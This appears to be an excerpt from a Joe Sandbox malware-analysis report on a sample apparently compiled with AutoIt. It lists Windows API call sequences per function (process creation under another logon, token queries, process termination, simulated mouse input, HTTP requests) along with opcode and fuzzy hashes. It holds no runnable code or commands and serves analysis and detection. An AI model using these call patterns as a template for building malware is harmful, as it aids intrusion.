                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: e1830613f57cc605a75c354744263f40e4f9c1c947c3d44165438c2b2871e887
                                                      • Instruction ID: 2ffd8684900d4dd7810393ca505d245bae087a8f0686b5183f4551dd96c73dd4
                                                      • Opcode Fuzzy Hash: e1830613f57cc605a75c354744263f40e4f9c1c947c3d44165438c2b2871e887
                                                      • Instruction Fuzzy Hash: 07518B70A0034AEFDF25CFA8D988FAEBBF5AF54314F11416DE8119B291D7709944CB61
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00A6179A
                                                      • GetWindowRect.USER32(?,?), ref: 00A617FE
                                                      • ScreenToClient.USER32(?,?), ref: 00A6181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A6182C
                                                      • EndPaint.USER32(?,?), ref: 00A61876
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: cc66a98da64e335d4875bc2a4b453c8813928790cdd5e0e9aeb3e062ca773e45
                                                      • Instruction ID: 963eb43d90ed3f788e496a59bc55755b5d9ad4a3605c9c1ef66733729cdcaa51
                                                      • Opcode Fuzzy Hash: cc66a98da64e335d4875bc2a4b453c8813928790cdd5e0e9aeb3e062ca773e45
                                                      • Instruction Fuzzy Hash: CF41A1702003409FDB11DF65DC84FB67BF8EB59724F080669F9958B1A1CB309C46DB61
                                                      APIs
                                                      • ShowWindow.USER32(00B267B0,00000000,015956A8,?,?,00B267B0,?,00AEB862,?,?), ref: 00AEB9CC
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00AEB9F0
                                                      • ShowWindow.USER32(00B267B0,00000000,015956A8,?,?,00B267B0,?,00AEB862,?,?), ref: 00AEBA50
                                                      • ShowWindow.USER32(00000000,00000004,?,00AEB862,?,?), ref: 00AEBA62
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00AEBA86
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AEBAA9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 988c584dc18ac9623d808d089a5c8a6d9063157221bbccdc4c68a158cab2fdcf
                                                      • Instruction ID: 60868efed84ffa669a866b459e683d355b87d3a89069a03e5002399d5da1990f
                                                      • Opcode Fuzzy Hash: 988c584dc18ac9623d808d089a5c8a6d9063157221bbccdc4c68a158cab2fdcf
                                                      • Instruction Fuzzy Hash: C9413134610281AFDF26CF55C89DBA67BE1FB05354F1841B9EA488F6A3C731A846CB61
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00AD5134,?,?,00000000,00000001), ref: 00AD73BF
                                                        • Part of subcall function 00AD3C94: GetWindowRect.USER32(?,?), ref: 00AD3CA7
                                                      • GetDesktopWindow.USER32 ref: 00AD73E9
                                                      • GetWindowRect.USER32(00000000), ref: 00AD73F0
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AD7422
                                                        • Part of subcall function 00AC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      • GetCursorPos.USER32(?), ref: 00AD744E
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AD74AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      APIs
                                                        • Part of subcall function 00AB85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AB8608
                                                        • Part of subcall function 00AB85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AB8612
                                                        • Part of subcall function 00AB85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AB8621
                                                        • Part of subcall function 00AB85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AB8628
                                                        • Part of subcall function 00AB85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AB863E
                                                      • GetLengthSid.ADVAPI32(?,00000000,00AB8977), ref: 00AB8DAC
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AB8DB8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AB8DBF
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AB8DD8
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00AB8977), ref: 00AB8DEC
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8DF3
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AB8B2A
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00AB8B31
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AB8B40
                                                      • CloseHandle.KERNEL32(00000004), ref: 00AB8B4B
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AB8B7A
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AB8B8E
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      APIs
                                                        • Part of subcall function 00A612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6135C
                                                        • Part of subcall function 00A612F3: BeginPath.GDI32(?), ref: 00A61373
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6139C
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AEC1C4
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00AEC1D8
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AEC1E6
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00AEC1F6
                                                      • EndPath.GDI32(00000000), ref: 00AEC206
                                                      • StrokePath.GDI32(00000000), ref: 00AEC216
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A803D3
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A803DB
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A803E6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A803F1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A803F9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A80401
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AC569B
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AC56B1
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00AC56C0
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56CF
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56D9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AC56E0
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00AC74E5
                                                      • EnterCriticalSection.KERNEL32(?,?,00A71044,?,?), ref: 00AC74F6
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00A71044,?,?), ref: 00AC7503
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A71044,?,?), ref: 00AC7510
                                                        • Part of subcall function 00AC6ED7: CloseHandle.KERNEL32(00000000,?,00AC751D,?,00A71044,?,?), ref: 00AC6EE1
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AC7523
                                                      • LeaveCriticalSection.KERNEL32(?,?,00A71044,?,?), ref: 00AC752A
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AB8E7F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00AB8E8B
                                                      • CloseHandle.KERNEL32(?), ref: 00AB8E94
                                                      • CloseHandle.KERNEL32(?), ref: 00AB8E9C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AB8EA5
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8EAC
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8928
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AD8A37
                                                      • VariantClear.OLEAUT32(?), ref: 00AD8BAF
                                                        • Part of subcall function 00AC7804: VariantInit.OLEAUT32(00000000), ref: 00AC7844
                                                        • Part of subcall function 00AC7804: VariantCopy.OLEAUT32(00000000,?), ref: 00AC784D
                                                        • Part of subcall function 00AC7804: VariantClear.OLEAUT32(00000000), ref: 00AC7859
                                                      Strings
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      APIs
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • _memset.LIBCMT ref: 00AC3077
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AC30A6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AC3159
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AC3187
                                                      Strings
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ABDAC5
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ABDAFB
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ABDB0C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ABDB8E
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 88ebadebe71e26ad3de1d49a387d42d2ca2fc512e3878263898762f1d30d3c1b
                                                      • Instruction ID: a7f2efb8b4fb3473f9c6b7015c46294d137ecdee76ae5fbbc634a6975f3e0e33
                                                      • Opcode Fuzzy Hash: 88ebadebe71e26ad3de1d49a387d42d2ca2fc512e3878263898762f1d30d3c1b
                                                      • Instruction Fuzzy Hash: 46415FB1600208EFDB15CF64C884ADABBBDEF44350F1581AEAD099F206E7B1D944CBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2CAF
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AC2CCB
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00AC2D11
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B26890,00000000), ref: 00AC2D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 5c2fe4d611a4eeafe5863ef46db69a9c64e3a550a6b146bc6f23020630601743
                                                      • Instruction ID: 7faa217d8364cbc6f873d04d194e834c681ec385b55de065745a4d6e7c88dfc1
                                                      • Opcode Fuzzy Hash: 5c2fe4d611a4eeafe5863ef46db69a9c64e3a550a6b146bc6f23020630601743
                                                      • Instruction Fuzzy Hash: 8A41B1702043419FDB21DF28C884F5BBBE8EF95320F15462DF96697291DB70E905CBA2
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00ADDAD9
                                                        • Part of subcall function 00A679AB: _memmove.LIBCMT ref: 00A679F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: 18d70478554c5e926c692001d1c15b61d68757b7cea3e045e8596a4edff9c500
                                                      • Instruction ID: 6359d6cccfdd5eb37e2a04d92984ed97b67156f42b8e6c4685686f1fe189fb6b
                                                      • Opcode Fuzzy Hash: 18d70478554c5e926c692001d1c15b61d68757b7cea3e045e8596a4edff9c500
                                                      • Instruction Fuzzy Hash: 11319271600619AFCF10EFA4CD919EEB3B5FF15314B10866AE866AB7D1DB31A905CB80
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AB93F6
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AB9409
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AB9439
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: 65f28685f97fda0016b451e122a486b44fce222afef2b23a3f606afe1dd2b277
                                                      • Instruction ID: 7915366d1ffdd7d6da7e3f123a3389ab454eee57a009bf97642c07447e641969
                                                      • Opcode Fuzzy Hash: 65f28685f97fda0016b451e122a486b44fce222afef2b23a3f606afe1dd2b277
                                                      • Instruction Fuzzy Hash: 5821E171900144BFDB14ABB0CC85CFFB7BCDF05360B108129FA25A72E2DB354E0A9620
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AD1B40
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AD1B66
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AD1B96
                                                      • InternetCloseHandle.WININET(00000000), ref: 00AD1BDD
                                                        • Part of subcall function 00AD2777: GetLastError.KERNEL32(?,?,00AD1B0B,00000000,00000000,00000001), ref: 00AD278C
                                                        • Part of subcall function 00AD2777: SetEvent.KERNEL32(?,?,00AD1B0B,00000000,00000000,00000001), ref: 00AD27A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: b3b250a854126caad9eccd90ef13b6b65e4dee46d1db690fd42fe45458517685
                                                      • Instruction ID: a926dde1ef4416f35a3ad1dc0e975379dbf5c525d18ceaeb70125c39375e661d
                                                      • Opcode Fuzzy Hash: b3b250a854126caad9eccd90ef13b6b65e4dee46d1db690fd42fe45458517685
                                                      • Instruction Fuzzy Hash: 19219FB1600208BFEB21DF609CC5EBF76FDEB89B44F10412BF506A6340EA309D069761
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AE66D0
                                                      • LoadLibraryW.KERNEL32(?), ref: 00AE66D7
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AE66EC
                                                      • DestroyWindow.USER32(?), ref: 00AE66F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: c1364c644d1e01330e53db2ef3de2e7d0246a29790ffdbde3d8153d2c99806a4
                                                      • Instruction ID: 608771253d6d1c942d316bd5d0c083d83c15116a008b345ac7b062567296d720
                                                      • Opcode Fuzzy Hash: c1364c644d1e01330e53db2ef3de2e7d0246a29790ffdbde3d8153d2c99806a4
                                                      • Instruction Fuzzy Hash: 1221A171110286AFEF148F65EC80EBB37ADEF693A8F104A29F910961A0D771DC519760
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AC705E
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AC7091
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AC70A3
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AC70DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 013aa6041fd2ff77345b032d11db13490345e9de105b39c89f27867c9bb774e1
                                                      • Instruction ID: 60035d7c548691bc094feaac7769c707f8c373165e17ec995ce5bfa6ac8d3042
                                                      • Opcode Fuzzy Hash: 013aa6041fd2ff77345b032d11db13490345e9de105b39c89f27867c9bb774e1
                                                      • Instruction Fuzzy Hash: 9F217C74504209ABDB209F68DC45F9E7BB8AF54721F218A2DFDA0D72D0EB7098408B50
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AC712B
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AC715D
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AC716E
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AC71A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 559b7ee1421a7da24865355ca2076dee5c8ef808b8a0dd4a66497b2b3918d125
                                                      • Instruction ID: cd15f2b7b86d2d73e95eea12013383f2eea55b913089a84c90079e23967888f0
                                                      • Opcode Fuzzy Hash: 559b7ee1421a7da24865355ca2076dee5c8ef808b8a0dd4a66497b2b3918d125
                                                      • Instruction Fuzzy Hash: 872171755042099FDB209F689C44F9EB7E8AF55720F25071DFDA1D72E0DB70A8418F51
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACAEBF
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00ACAF13
                                                      • __swprintf.LIBCMT ref: 00ACAF2C
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00AEF910), ref: 00ACAF6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: c3e99750020acfee1e80ac26a807a04152704f39216ba33f8b839a8df2cf4916
                                                      • Instruction ID: b20c27d620fb1d358907f6ae28bb7ff5bb773edd360ca98beb9e7d5817fa9bde
                                                      • Opcode Fuzzy Hash: c3e99750020acfee1e80ac26a807a04152704f39216ba33f8b839a8df2cf4916
